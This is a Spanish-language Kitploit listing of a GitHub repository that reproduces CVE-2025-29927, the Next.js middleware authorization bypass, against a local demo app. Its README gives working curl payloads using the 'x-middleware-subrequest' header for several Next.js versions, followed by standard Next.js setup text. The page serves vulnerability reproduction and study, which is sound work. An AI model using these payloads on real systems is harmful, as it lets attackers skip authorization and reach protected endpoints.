Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-2995 — Reproducción de la omisión de autorización CVE-2025-29927 en middleware de Next.js, con payloads de explotación basados en curl para múltiples versiones. | Kitploit
Herramientas/GitHubGitHub/huynguyen12536/cve-2025-2995
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubhuynguyen12536/cve-2025-2995

CVE-2025-2995

Reproducción de la omisión de autorización CVE-2025-29927 en middleware de Next.js, con payloads de explotación basados en curl para múltiples versiones.

Ver Repositorio
hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Reproducción de omisión de autorización CVE-2025-29927

Este repositorio es una reproducción de la vulnerabilidad CVE-2025-29927 en el paquete next

Cómo reproducir

  1. Sigue los pasos a continuación para clonar y ejecutar la aplicación Next.js
  2. Prueba que la autorización deniega el acceso al endpoint /api/hello
root@kitploit:~
$ curl http://localhost:3000/api/hello

{"error":"Unauthorized"}%
  1. Prueba que la autorización funciona cuando se proporciona un token
root@kitploit:~
$ curl -H "Authorization: my-jwt-token-here" http://localhost:3000/api/hello

{"message":"Hello World"}%
  1. Ahora también se puede omitir si anidamos middleware 5 veces en el encabezado especial x-middleware-subrequest:
root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/api/hello

{"message":"Hello, World"}

Explotación de CVE-2025-29927 para versiones antiguas de Next.js

Las versiones 12 y 13 de Next.js solían tener una convención de nomenclatura diferente para el archivo de middleware (_middleware.js), que se cambió a middleware.js en Next.js 14. Esta vulnerabilidad se puede explotar en versiones antiguas utilizando el archivo _middleware.js.

Por ejemplo, los siguientes payloads se aplicarían, dependiendo de la versión de Next.js y tu convención de enrutamiento:

  • curl -H "x-middleware-subrequest: middleware" http://localhost:3000/api/hello (para versiones 12.2 de Next.js con el archivo middleware.js en la raíz de la aplicación, no dentro del directorio pages)
    • curl -H "x-middleware-subrequest: src/middleware" http://localhost:3000/api/hello
  • curl -H "x-middleware-subrequest: _middleware" http://localhost:3000/api/hello (para versiones 11 a 12.2 de Next.js)
  • curl -H "x-middleware-subrequest: pages/_middleware" http://localhost:3000/api/hello
  • curl -H "x-middleware-subrequest: pages/admin/_middleware" http://localhost:3000/api/hello

Primeros pasos

Primero, ejecuta el servidor de desarrollo:

root@kitploit:~
npm run dev
# or
yarn dev
# or
pnpm dev
# or
bun dev

Abre http://localhost:3000 en tu navegador para ver el resultado.

Puedes empezar a editar la página modificando app/page.js. La página se actualiza automáticamente mientras editas el archivo.

Este proyecto utiliza next/font para optimizar y cargar automáticamente Geist, una nueva familia de fuentes para Vercel.

Más información

Para obtener más información sobre Next.js, echa un vistazo a los siguientes recursos:

  • Documentación de Next.js - aprende sobre las características y la API de Next.js.
  • Aprende Next.js - un tutorial interactivo de Next.js.

Puedes consultar el repositorio de Next.js en GitHub - ¡tus comentarios y contribuciones son bienvenidos!

Desplegar en Vercel

La forma más sencilla de desplegar tu aplicación Next.js es usar la plataforma Vercel de los creadores de Next.js.

Consulta nuestra documentación de despliegue de Next.js para más detalles.

Descargar herramienta